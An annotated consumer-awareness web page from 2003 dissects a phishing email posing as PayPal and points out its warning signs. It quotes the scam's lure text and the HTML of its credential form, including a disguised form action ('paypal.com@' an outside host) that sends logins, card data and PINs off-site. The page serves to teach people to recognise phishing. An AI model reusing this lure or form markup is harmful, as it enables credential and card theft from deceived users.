In May of 2003 we received a letter from PayPal requesting that we verify
our account to ensure our service could continue. On the surface this
seems like a reasonable request. Please read our comments to the right
of the letter. Some of the problems with this letter are obvious but some
are very subtle.
We have received several additional mailings since this page was produced.
Each of these had different opt-out messages but otherwise they were almost
identical. It took several months for the media to pick up on this:
In December, 2003 we received another note supposedly from PayPal. Apparently
someone is reading the Web and magazine articles and listening to the
radio because they have addressed many of our concerns in their latest
scam. Click here to read that
story.
| From |
Paysecurity <paysecurity@paypal.com> |
This looks like an official
letter from PayPal, although we have no way of knowing if "PaySecurity"
is a valid mailbox. |
| Date |
Saturday, May 24, 2003 5:26 PM |
| To |
< our e-mail address > |
| Subject |
Dear PayPal Customer |
|
|
It took us only five minutes to re-create the look of this
letter using PayPal's logo and the blue graphic. The Verdana
font, and the shaded gray text at the bottom, further imitate
PayPal's look.
|
| |
|
Dear
PayPal Customer
|
|
This
e-mail is the notification of recent innovations taken by
PayPal to detect inactive customers and non-functioning mailboxes.
The
inactive customers are subject to restriction and removal
in the next 3 months.
Please
confirm your e-mail address and and Credit Card info
number by logging in to your PayPal account using the
form below:
|
It costs little, if anything, to maintain a dormant account.
Dropping an inactive user means the potential loss of revenue.
No reputable financial institution will ask you to verify
your private information in this manner.
|
|
|
There are several major problems
with this form:
|
| 1. |
PayPal uses your e-mail account as your
user ID. |
| 2. |
Never give out your password to anyone,
ever! Your user ID and password allow full access to your
account. |
| 3. |
PayPal should have your credit card information on
file. This information will allow someone to make on-line
purchases.
|
| 4. |
Your PIN is being requested. Banks will
never ask you for this number. |
| 5. |
Clicking "Log In" will send your
private information via an unsecured server. |
|
|
This
notification expires May 31, 2003
Thanks
for using PayPal!
|
The
expiration date lends a sense of urgency to the request. |
|
.
. . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . .
|
|
|
This notification was indeed "sent to our mailbox",
however, this is not the mailbox PayPal has on record.
This is supposed to be an urgent letter to PayPal's clients,
not a "newsletter or product update".
|
|
This is supposed to be a business letter to PayPal's clients.
If so, why does it include an "opt out" from receiving
product offerings and solicitations from Providian National
Bank?
|
| Why is this letter
copyright? Why is the date 2002 when it was sent in May 2003? |
|
|
This letter is asking us to send private information through an
unsecured site. Mail servers and standard HTTP:// Websites
are not secure for financial transactions. Secure sites have a name
starting with HTTPS:// (note the S). This information
is being sent in the clear and therefore subject to being captured
and misused.
So, how could a reputable company like PayPal make so many foolish
blunders? Our guess is that they didn't. We wrote to PayPal about
this letter and received the reply reproduced below. Our suspicion
that this is a scam were confirmed by the second paragraph.
|
| |
|
Thank you for bringing this incident of suspicious activity
to our attention. PayPal will investigate this activity immediately
and contact you further if any additional information is required.
We appreciate your concern and Thank you for making PayPal
the most trusted online payment service.
PayPal and its representatives will NEVER ask you to reveal
your password. There are NO EXCEPTIONS to this policy. If
anyone claiming to work for PayPal asks for your password
under any circumstances, by email or by phone, please refuse
and immediately contact us via webform at https://www.paypal.com/wf/f=sa_pass.
|
|
| |
The purpose of this letter becomes more apparent if you analyze
the code for the form used in the letter. When you click the "Log
In" button at the bottom of the form you will send the name
and value for each of the six fields in the form. The important
parts of two fields are shown below in bold text. Note
that the ID field is a seventh "hidden" field that you
will not see but it will be sent nonetheless.
<input name="full_name" type="text"
size="30" maxlength="32">
<input name="ID" type="hidden"
size="30" maxlength="32" value="n8h4hnew">
When you click on the "Log In" button you will send the
form with the six fields you entered, plus the hidden field, to
the address listed in "form action" below. Your private
information will be going to this unsecured site, where a script
on the page will do something with it. The follow-up note we received
from PayPal, reproduced below, explains what is probably happening.
<form action="http://www.paypal.com@superspeed.port5.com/000.php"
method="get">
|
|
PayPal's referral program is meant to encourage people to
introduce the benefits of PayPal to their friends and family,
and to people they transact with online. It is not intended
to encourage spam. We apologize for this inconvenience and
appreciate your report.
|
|
| |
|
PayPal has a program whereby they will pay you $5 to refer a friend
or associate who uses their service. It appears that for each response
to this e-mail someone stands to pocket $5. Perhaps having someone
steal $5 from PayPal is not important to you. Perhaps having someone
have access to your credit card information, including its PIN,
is!
Is this spam a scam? Our guess is that it is.
Beware of similar scams "from" other reputable companies,
such as eBay, that ask for personal identification or that try to
install software.
For example, one letter "from" Microsoft offers to update the security
of your computer to the latest level. If you open the attached file
you will send the letter to people on your mailing list, not to
mention fouling up your computer. Microsoft (and most companies)
will never send out patches. They may send you a link to their update
page but they will never send you files.
|
